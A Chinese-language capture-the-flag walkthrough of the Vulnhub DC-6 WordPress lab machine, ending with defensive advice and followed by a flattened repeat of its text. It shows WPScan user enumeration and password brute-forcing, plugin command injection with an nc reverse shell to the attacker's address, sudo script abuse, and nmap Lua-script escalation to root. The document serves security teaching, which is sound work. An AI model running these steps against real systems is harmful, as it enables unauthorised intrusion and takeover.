Vulnhub靶机渗透测试之DC-6-wordpress+nmap提权
字数 1392 2025-08-15 21:33:30

Vulnhub靶机DC-6渗透测试教学文档

靶机概述

DC-6是Vulnhub平台提供的一个WordPress靶机环境,主要考察以下技术点:

  • WordPress网站渗透
  • WPScan工具使用
  • Activity Monitor插件漏洞利用
  • 用户水平越权
  • Nmap提权技术

环境准备

靶机下载与部署

  1. 从Vulnhub官网下载DC-6靶机:https://download.vulnhub.com/dc/DC-6.zip
  2. 解压后得到.ova文件,使用VMware或VirtualBox导入
  3. 建议对导入的虚拟机创建快照

网络配置

  • 攻击机(Kali Linux): 192.168.2.19
  • 靶机(DC-6): 192.168.2.25
  • 网络模式: 桥接模式

必要配置

在攻击机上修改hosts文件:

sudo vim /etc/hosts

添加以下内容:

192.168.2.25 wordy

信息收集阶段

端口扫描

使用nmap进行基础扫描:

nmap -sV 192.168.2.25

发现开放端口:

  • 22/tcp - SSH
  • 80/tcp - HTTP (WordPress)

WordPress信息收集

使用WPScan进行初步扫描:

wpscan --url http://wordy/ --enumerate u

发现5个用户名:

  • admin
  • mark
  • graham
  • sarah
  • jens

密码爆破

准备字典

  1. 创建用户名字典文件:
vim dc-username.txt

内容:

admin
mark
graham
sarah
jens
  1. 准备密码字典:
gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6-passwd.txt

执行爆破

wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt

成功爆破出mark用户的密码:helpdesk01

WordPress后台渗透

登录后台

使用mark/helpdesk01登录WordPress后台

Activity Monitor插件漏洞利用

  1. 访问Activity Monitor -> Tools

  2. 执行命令时使用Burp Suite拦截请求

  3. 前端限制15字符,可通过F12修改HTML解除限制

  4. 设置反弹shell:

    • Kali监听:nc -lvvp 4444
    • Burp修改请求为:nc 192.168.2.19 4444 -e /bin/bash

  5. 获取稳定shell:

python -c 'import pty;pty.spawn("/bin/bash")'

水平越权

发现其他用户凭据

在mark用户目录下发现graham用户的密码:GSo7isUM1D4

切换用户

su graham
密码:GSo7isUM1D4

权限提升

检查sudo权限

sudo -l

输出显示:

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

分析backups.sh脚本

cat /home/jens/backups.sh

发现这是一个可以以jens用户身份执行的脚本

利用脚本提权

  1. 修改脚本内容:
echo '/bin/bash' > /home/jens/backups.sh
  1. 执行脚本:
sudo -u jens /home/jens/backups.sh

现在获得jens用户的shell

检查jens的sudo权限

sudo -l

发现jens可以以root身份执行nmap

Nmap提权

  1. 创建nmap脚本:
echo 'os.execute("/bin/bash")' > shell
  1. 执行提权:
sudo nmap --script=shell

成功获得root权限

关键知识点总结

  1. 信息收集

    • 主机发现与端口扫描
    • WordPress用户枚举
    • 敏感文件发现

  2. WPScan工具使用

    • 用户名枚举
    • 密码爆破
    • 漏洞扫描

  3. WordPress插件漏洞

    • Activity Monitor插件的RCE漏洞
    • 前端限制绕过
    • 反弹shell技术

  4. 权限提升技术

    • 水平越权(用户间切换)
    • Sudo权限滥用
    • Nmap提权技术

  5. 后渗透技巧

    • 不稳定shell的稳定化
    • 权限维持技术
    • 敏感信息挖掘

防御建议

  1. WordPress安全措施:

    • 使用强密码策略
    • 限制登录尝试次数
    • 及时更新插件和核心

  2. 系统安全配置:

    • 合理配置sudo权限
    • 限制setuid程序
    • 定期审计用户权限

  3. 网络防护:

    • 配置防火墙规则
    • 监控异常网络连接
    • 实施最小权限原则

通过本靶机的完整渗透过程,可以全面了解从信息收集到最终提权的完整攻击链,以及相应的防御策略。

Vulnhub靶机DC-6渗透测试教学文档 靶机概述 DC-6是Vulnhub平台提供的一个WordPress靶机环境,主要考察以下技术点: WordPress网站渗透 WPScan工具使用 Activity Monitor插件漏洞利用 用户水平越权 Nmap提权技术 环境准备 靶机下载与部署 从Vulnhub官网下载DC-6靶机:https://download.vulnhub.com/dc/DC-6.zip 解压后得到.ova文件,使用VMware或VirtualBox导入 建议对导入的虚拟机创建快照 网络配置 攻击机(Kali Linux): 192.168.2.19 靶机(DC-6): 192.168.2.25 网络模式: 桥接模式 必要配置 在攻击机上修改hosts文件: 添加以下内容: 信息收集阶段 端口扫描 使用nmap进行基础扫描: 发现开放端口: 22/tcp - SSH 80/tcp - HTTP (WordPress) WordPress信息收集 使用WPScan进行初步扫描: 发现5个用户名: admin mark graham sarah jens 密码爆破 准备字典 创建用户名字典文件: 内容: 准备密码字典: 执行爆破 成功爆破出mark用户的密码: helpdesk01 WordPress后台渗透 登录后台 使用mark/helpdesk01登录WordPress后台 Activity Monitor插件漏洞利用 访问Activity Monitor -> Tools 执行命令时使用Burp Suite拦截请求 前端限制15字符,可通过F12修改HTML解除限制 设置反弹shell: Kali监听: nc -lvvp 4444 Burp修改请求为: nc 192.168.2.19 4444 -e /bin/bash 获取稳定shell: 水平越权 发现其他用户凭据 在mark用户目录下发现graham用户的密码: GSo7isUM1D4 切换用户 权限提升 检查sudo权限 输出显示: 分析backups.sh脚本 发现这是一个可以以jens用户身份执行的脚本 利用脚本提权 修改脚本内容: 执行脚本: 现在获得jens用户的shell 检查jens的sudo权限 发现jens可以以root身份执行nmap Nmap提权 创建nmap脚本: 执行提权: 成功获得root权限 关键知识点总结 信息收集 : 主机发现与端口扫描 WordPress用户枚举 敏感文件发现 WPScan工具使用 : 用户名枚举 密码爆破 漏洞扫描 WordPress插件漏洞 : Activity Monitor插件的RCE漏洞 前端限制绕过 反弹shell技术 权限提升技术 : 水平越权(用户间切换) Sudo权限滥用 Nmap提权技术 后渗透技巧 : 不稳定shell的稳定化 权限维持技术 敏感信息挖掘 防御建议 WordPress安全措施: 使用强密码策略 限制登录尝试次数 及时更新插件和核心 系统安全配置: 合理配置sudo权限 限制setuid程序 定期审计用户权限 网络防护: 配置防火墙规则 监控异常网络连接 实施最小权限原则 通过本靶机的完整渗透过程,可以全面了解从信息收集到最终提权的完整攻击链,以及相应的防御策略。